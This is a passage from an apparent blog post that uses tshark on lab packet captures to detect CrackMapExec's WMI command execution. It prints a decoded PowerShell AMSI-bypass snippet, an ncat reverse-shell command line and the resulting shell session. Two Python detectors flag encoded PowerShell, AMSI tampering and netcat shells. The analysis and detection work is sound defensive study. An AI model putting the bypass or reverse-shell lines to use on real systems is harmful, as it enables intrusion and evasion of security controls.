   81  43.682025   10.0.0.100 → 10.0.0.105   DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: f309ad18-d86a-11d0-a075-00c04fb68820 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   82  43.682530   10.0.0.105 → 10.0.0.100   DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   86  43.702770   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   88  43.718458   10.0.0.100 → 10.0.0.105   DCERPC 210 Request: call_id: 2, Fragment: Single, opnum: 6, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
   89  43.719805   10.0.0.105 → 10.0.0.100   DCERPC 294 Response: call_id: 2, Fragment: Single, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
   90  43.727167   10.0.0.100 → 10.0.0.105   DCERPC 166 Alter_context: call_id: 3, Fragment: Single, 1 context items: IRemUnknown V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   91  43.727812   10.0.0.105 → 10.0.0.100   DCERPC 402 Alter_context_resp: call_id: 3, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   92  43.747847   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 3, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   94  43.765583   10.0.0.100 → 10.0.0.105   IRemUnknown 182 RemRelease request Cnt=1 Refs=1-0
   95  43.766108   10.0.0.105 → 10.0.0.100   IRemUnknown 118 RemRelease response -> S_OK
   96  43.772729   10.0.0.100 → 10.0.0.105   DCERPC 166 Alter_context: call_id: 5, Fragment: Single, 1 context items: 9556dc99-828c-11cf-a37e-00aa003240c7 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   97  43.773407   10.0.0.105 → 10.0.0.100   DCERPC 402 Alter_context_resp: call_id: 5, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   98  43.788367   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 5, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
  100  43.827914   10.0.0.100 → 10.0.0.105   DCERPC 226 Request: call_id: 6, Fragment: Single, opnum: 6, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  101  43.835340   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: 1st, Ctx: 2
  103  43.835429   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  105  43.835655   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  107  43.835711   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  109  43.835917   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  111  43.835981   10.0.0.105 → 10.0.0.100   DCERPC 790 Response: call_id: 6, Fragment: Last, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  114  44.446346   10.0.0.100 → 10.0.0.105   DCERPC 2050 Request: call_id: 7, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  116  44.578642   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 7, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  144  44.726719   10.0.0.100 → 10.0.0.105   DCERPC 2046 Request: call_id: 8, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  147  44.753078   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 8, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  177  44.960333   10.0.0.100 → 10.0.0.105   DCERPC 2738 Request: call_id: 9, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  181  44.992849   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 9, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0

The above looks interesting in that there is some cleartext. Let's follow the stream to see if we see anything of interest. Please note I've edited the output below for brevity and kept only what I believe was important.

root@securitynik:~/cme# tshark -q -n -r cme-powershell.pcap -n -z follow,tcp,ascii,10.0.0.100:37794,10.0.0.105:49666
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.100 and tcp.srcport eq 37794) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 49666)) or ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 37794))
Node 0: 10.0.0.100:37794
Node 1: 10.0.0.105:49666
112
....5..NTLMSSP.........p...".".........@.......V.......p...........5...S.E.C.U.R.I.T.Y.N.I.K.a.d.m.i.n.i.s.t.r.a.t.o.r....T...J7..7...bOk63ZTRY........i.4.............`J9K....Ok63ZTRY........S.E.C.N.I.K.-.2.K.1.9.....S.E.C.U.R.I.T.Y.N.I.K...:.S.E.C.N.I.K.-.2.K.1.9...s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l.....`J9K...... .c.i.f.s./.S.E.C.N.I.K.-.2.K.1.9.........
.).yPDg...Q' S.
156
................\................@ic#..................l..9H...*..?#....c..............././.../.r.o.o.t./.c.i.m.v.2.................
.....................................................................................................q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1..C:\....C...........
....5......s.H.........
..........................................................................................................................................................................................................................................................p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd  1> \\127.0.0.1\C$\Windows\Temp\AZGdHz 2>&1..C:\.>A..........
....5.........n..[H....
..D.................object:Win32_ProcessStartup.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$........0......................__PARAMETERS..cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded 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 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1..C:\.FF..........
....5......hj..h$......

===================================================================

As we can see from above, we seem to have some powershell code being executed. However, we do not see any results. This is still good, as at least we have something of interest at this point. Let's copy this code and decode it at the Linux command line.


root@securitynik:~/cme# echo "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" | base64 --decode
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
try{ 
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
get-process

From above, we can conclude that the "get-process" cmdlet was executed via powershell.

No more analysis for us to do on this pcap file via tshark.

Now that we know what a powershell command may look like when run via crackmapexec, let's take a look at a "normal" command being executed. In this case, if you remember, in the first post we executed "ncat.exe". Let's see how we may be able to detect this with raw packet analysis.

As always, let's first look at the protocol hierarchy of our pcap.


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:356 bytes:86187
  ip                                     frames:356 bytes:86187
    tcp                                  frames:356 bytes:86187
      nbss                               frames:160 bytes:34441
        smb                              frames:3 bytes:381
        smb2                             frames:157 bytes:34060
      dcerpc                             frames:31 bytes:39474
        isystemactivator                 frames:2 bytes:1644
        remunk                           frames:2 bytes:300
        dcerpc.stub_data                 frames:5 bytes:21630
        dcerpc.fragments                 frames:1 bytes:790
      data                               frames:13 bytes:989
      ssl                                frames:14 bytes:1075
        tcp.segments                     frames:4 bytes:256
===================================================================

Now that we have the protocol hierarchy, let's look at the TCP conversations


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z conv,tcp
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:57950           <-> 10.0.0.105:445                  86     15850     100     15434     186     31284     0.023652000        20.0220
10.0.0.105:50602           <-> 10.0.0.100:443                  29      1600      28      2126      57      3726     3.366351000        32.4745
10.0.0.105:49666           <-> 10.0.0.100:43388                26      9658      23     28398      49     38056     0.145434000        19.8985
10.0.0.100:57952           <-> 10.0.0.105:445                  14      2952      15      2945      29      5897     0.042055000        19.9831
10.0.0.100:57948           <-> 10.0.0.105:445                   9      1638      10      1166      19      2804     0.000000000        20.0444
10.0.0.100:60342           <-> 10.0.0.105:135                   7      2808       9      1612      16      4420     0.098815000        19.9435
================================================================================

If we look at the first conversation above, we see it has the most bytes (15850). However, as we look at the second conversation, we see it has the longest duration of all the conversations (3.366 seconds). While we can start with the first conversation, I will instead in the interest of time start with the second, simply because it has the longest duration.


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -Y "( tcp.port == 50602 ) && ( tcp.port == 443 )" | more
  190   3.366351   10.0.0.105 → 10.0.0.100   TCP 66 50602 → 443 [SYN, ECN, CWR] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
  191   3.366379   10.0.0.100 → 10.0.0.105   TCP 66 443 → 50602 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460 SACK_PERM=1 WS=128
  192   3.366597   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [ACK] Seq=1 Ack=1 Win=2102272 Len=0
  200   3.496322   10.0.0.105 → 10.0.0.100   TCP 96 50602 → 443 [PSH, ACK] Seq=1 Ack=1 Win=2102272 Len=42
  201   3.496342   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=43 Win=29312 Len=0
  202   3.496527   10.0.0.105 → 10.0.0.100   SSL 110 Continuation Data
  203   3.496533   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=99 Win=29312 Len=0
  204   3.511061   10.0.0.105 → 10.0.0.100   TCP 60 [TCP segment of a reassembled PDU]
  205   3.511078   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=101 Win=29312 Len=0
............

  347  30.994013   10.0.0.105 → 10.0.0.100   TCP 60 [TCP segment of a reassembled PDU]
  348  30.994030   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=18 Ack=545 Win=29312 Len=0
  349  30.994182   10.0.0.105 → 10.0.0.100   SSL 60 Continuation Data
  350  30.994188   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=18 Ack=549 Win=29312 Len=0
  351  35.836894   10.0.0.100 → 10.0.0.105   TCP 59 443 → 50602 [PSH, ACK] Seq=18 Ack=549 Win=29312 Len=5
  352  35.837355   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [PSH, ACK] Seq=549 Ack=23 Win=2102272 Len=5
  353  35.837371   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=23 Ack=554 Win=29312 Len=0
  354  35.840523   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [FIN, ACK] Seq=554 Ack=23 Win=2102272 Len=0
  355  35.840639   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [FIN, ACK] Seq=23 Ack=555 Win=29312 Len=0
  356  35.840840   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [ACK] Seq=555 Ack=24 Win=2102272 Len=0

From above, we see port 443, which suggests SSL communication. However, we see no SSL negotiation, which is typically done right after the 3-way handshake is completed. Considering there is no SSL negotiation, is there a possibility that we may be able to see the cleartext data? Let's reassemble the session by following the TCP stream to see what we get.


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:50602,10.0.0.100:443 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 50602) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 443)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 443) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 50602))
Node 0: 10.0.0.105:50602
Node 1: 10.0.0.100:443
42
Microsoft Windows [Version 10.0.17763.253]

(c) 2018 Microsoft Corporation. All rights reserved.
C:\>
whoami

whoami

securitynik\administrator
C:\>
net users
net users
User accounts for \\

-------------------------------------------------------------------------------

Administrator            Guest                    
krbtgt                   
nakia                    neysa                    nik                      
Prague                   
saadia                   
securitynik              
The command completed with one or more errors.

C:\>
exit
exit

Ahhh, from above we see that even though the traffic is on port 443, this communication is not encrypted. Interesting!
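tshark labelled those segments "SSL Continuation Data" only because its dissector is chosen by port; the content never contained a TLS handshake. The check below is an added example (mine, not code from this post or from any tool it uses) that decides from the first data bytes of a flow whether a TLS ClientHello is actually present, and flags flows where a port that should carry TLS is carrying printable cleartext instead. The samples are constructed: the banner is the 42-byte first segment this post recovered on port 443, and the ClientHello prefix is a minimal TLS 1.2 handshake record header.

```python
import string

TLS_RECORD_HANDSHAKE = 0x16
TLS_HANDSHAKE_CLIENT_HELLO = 0x01
TLS_PORTS = {443, 465, 636, 993, 995, 8443}   # ports where a TLS handshake is expected

# Constructed samples: the cleartext banner seen on port 443 in this post, and the start of a
# minimal ClientHello record (type 0x16, version 3.1, length 0xc4, handshake type 0x01).
WINDOWS_BANNER = b"Microsoft Windows [Version 10.0.17763.253]"
CLIENT_HELLO_PREFIX = bytes.fromhex("160301 00c4 01 0000c0 0303")


def looks_like_tls_client_hello(payload: bytes) -> bool:
    """True if the bytes start with a TLS record (type 0x16, version 3.x) carrying a ClientHello."""
    if len(payload) < 6:
        return False
    content_type, major, minor = payload[0], payload[1], payload[2]
    if content_type != TLS_RECORD_HANDSHAKE or major != 0x03 or minor > 0x04:
        return False
    record_len = int.from_bytes(payload[3:5], "big")
    if record_len == 0 or record_len > 2**14 + 2048:    # record size bound from RFC 8446
        return False
    return payload[5] == TLS_HANDSHAKE_CLIENT_HELLO


def printable_ratio(payload: bytes) -> float:
    """Share of bytes that are printable ASCII, a cheap cleartext indicator."""
    if not payload:
        return 0.0
    printable = set(string.printable.encode("ascii"))
    return sum(b in printable for b in payload) / len(payload)


def classify_flow(server_port: int, first_payload: bytes) -> str:
    """Classify a flow from its server port and the first data bytes seen on it, either direction."""
    if looks_like_tls_client_hello(first_payload):
        return "tls"
    cleartext = printable_ratio(first_payload) >= 0.9
    if server_port in TLS_PORTS:
        return "cleartext-on-tls-port" if cleartext else "binary-on-tls-port"
    return "cleartext" if cleartext else "binary"


def flows_worth_a_look(flows):
    """From (src, sport, dst, dport, first_payload) tuples, return the port/content mismatches."""
    findings = []
    for src, sport, dst, dport, payload in flows:
        verdict = classify_flow(dport, payload)
        if verdict.endswith("on-tls-port"):
            findings.append((f"{src}:{sport} -> {dst}:{dport}", verdict))
    return findings


if __name__ == "__main__":
    sample_flows = [
        ("10.0.0.105", 50602, "10.0.0.100", 443, WINDOWS_BANNER),
        ("10.0.0.1", 40000, "10.0.0.2", 443, CLIENT_HELLO_PREFIX),
    ]
    for flow, verdict in flows_worth_a_look(sample_flows):
        print(verdict, flow)
```

A second signal worth keeping from this capture is direction: in a genuine TLS session the side that opened the connection speaks first with a ClientHello, whereas here the host that opened the connection (10.0.0.105) spoke first with a command prompt banner.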

If we go through the other conversations, we see mostly unreadable traffic. However, as we follow the stream for the conversation with "10.0.0.105:49666" and "10.0.0.100:43388", we see the following:


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:49666,10.0.0.100:43388 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 43388)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 43388) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 49666))
Node 0: 10.0.0.100:43388
Node 1: 10.0.0.105:49666

......
.......................f..... ..D.................object:Win32_ProcessStartup................................................................................................................
.............................................................................................................................................................................................
...........q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\YkGcDv 2>&1..C:\....ri..........
....5.......,L....f....
.............................................................................................................................................................................................
.............................................................................................................................................................................................
...........p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd  1> \\127.0.0.1\C$\Windows\Temp\egHJIv 2>&1..C:\..I..........
....5....... h...r@....
.............................................................................................................................................................................................
....................0......................__PARAMETERS..cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1..C:\.Cg..........
....5..........WG......

From the rebuilt session above we see, amongst other items, "ncat.exe" being executed with various arguments.
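Both this stream and the earlier powershell one carry the same cleartext structure inside the DCERPC stub data: a Win32_Process call whose command line reads `cmd.exe /Q /c <command> 1> \\127.0.0.1\C$\Windows\Temp\<name> 2>&1`. That line is what a detection can extract regardless of what the command is. The Python below is an added example (mine, not this post's or crackmapexec's code) covering both cases: it pulls every command line and output path out of stub data, decodes a `-encoded` argument when one is present (PowerShell takes base64 of UTF-16LE text; the decoder accepts UTF-8 as well) and tags the indicators an analyst would want flagged. The stub data is constructed, modelled on the two follow-stream dumps above, with NUL bytes where the dumps show dots; the encoded payload is a constructed stand-in for the one in the post, and the temp file names are placeholders.

```python
import base64
import re

# Constructed stand-in for the post's encoded payload: base64 over UTF-16LE, as PowerShell expects.
ENCODED_SAMPLE = base64.b64encode("get-process".encode("utf-16le")).decode("ascii")

# Constructed stub data modelled on the follow-stream output above (placeholder temp names).
SAMPLE_STUB_DATA = (
    b"\x00\x00__PARAMETERS\x00\x00cmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\C$\\Windows\\Temp\\aaaaaa 2>&1\x00\x00C:\\\x00"
    b"\x00\x00__PARAMETERS\x00\x00cmd.exe /Q /c cd  1> \\\\127.0.0.1\\C$\\Windows\\Temp\\bbbbbb 2>&1\x00\x00C:\\\x00"
    b"\x00\x00__PARAMETERS\x00\x00cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded "
    + ENCODED_SAMPLE.encode("ascii") +
    b" 1> \\\\127.0.0.1\\C$\\Windows\\Temp\\cccccc 2>&1\x00\x00C:\\\x00"
    b"\x00\x00__PARAMETERS\x00\x00cmd.exe /Q /c c:\\tools\\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443"
    b" 1> \\\\127.0.0.1\\C$\\Windows\\Temp\\dddddd 2>&1\x00\x00C:\\\x00"
)

# The command line and its redirect target as they appear in the Win32_Process stub data.
WMI_COMMAND = re.compile(
    rb"cmd\.exe /Q /c (?P<cmd>.*?) 1> (?P<out>\\\\127\.0\.0\.1\\C\$\\Windows\\Temp\\[A-Za-z]+) 2>&1"
)
# Common spellings of PowerShell's -EncodedCommand switch followed by a base64 blob.
ENCODED_SWITCH = re.compile(r"-e(?:n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)

# (pattern, label) pairs checked against the command line plus any decoded script body.
INDICATOR_PATTERNS = [
    (ENCODED_SWITCH.pattern, "base64-encoded PowerShell command"),
    (r"-(?:ex|exec|executionpolicy|ep)\s+bypass", "execution policy bypass"),
    (r"-w(?:indow|indowstyle)?\s+hidden", "hidden PowerShell window"),
    (r"amsiutils|amsiinitfailed", "AMSI tampering in script body"),
    (r"\bncat\.exe|\bnc\.exe|netcat", "netcat-style binary invoked"),
    (r"--exec\s+cmd\.exe|-e\s+cmd\.exe", "cmd.exe attached to a network socket"),
]


def decode_encoded_command(command: str):
    """Decode the base64 argument of -encoded/-enc/-e; None if absent or not valid base64."""
    m = ENCODED_SWITCH.search(command)
    if m is None:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return None
    # UTF-16LE text in the ASCII range has a NUL in every odd position.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")


def suspicious_indicators(command: str, decoded):
    text = command + "\n" + (decoded or "")
    return [label for pattern, label in INDICATOR_PATTERNS if re.search(pattern, text, re.I)]


def extract_commands(stub_data: bytes):
    """Pull every cmd.exe command line (and its output file) out of raw stub data."""
    results = []
    for m in WMI_COMMAND.finditer(stub_data):
        command = m.group("cmd").decode("latin-1").strip()
        decoded = decode_encoded_command(command)
        results.append({
            "command": command,
            "output_path": m.group("out").decode("latin-1"),
            "decoded": decoded,
            "indicators": suspicious_indicators(command, decoded),
        })
    return results


if __name__ == "__main__":
    for entry in extract_commands(SAMPLE_STUB_DATA):
        print(entry["command"])
        print("   output ->", entry["output_path"])
        if entry["decoded"] is not None:
            print("   decoded:", entry["decoded"])
        if entry["indicators"]:
            print("   flags:", ", ".join(entry["indicators"]))
```

The output path itself is a useful indicator on its own: a command whose stdout and stderr go to a random name under the local admin share via 127.0.0.1 is the pattern this tool leaves in both captures, independent of whether the command was powershell or ncat.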

Ok. That's it for this post.



Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis
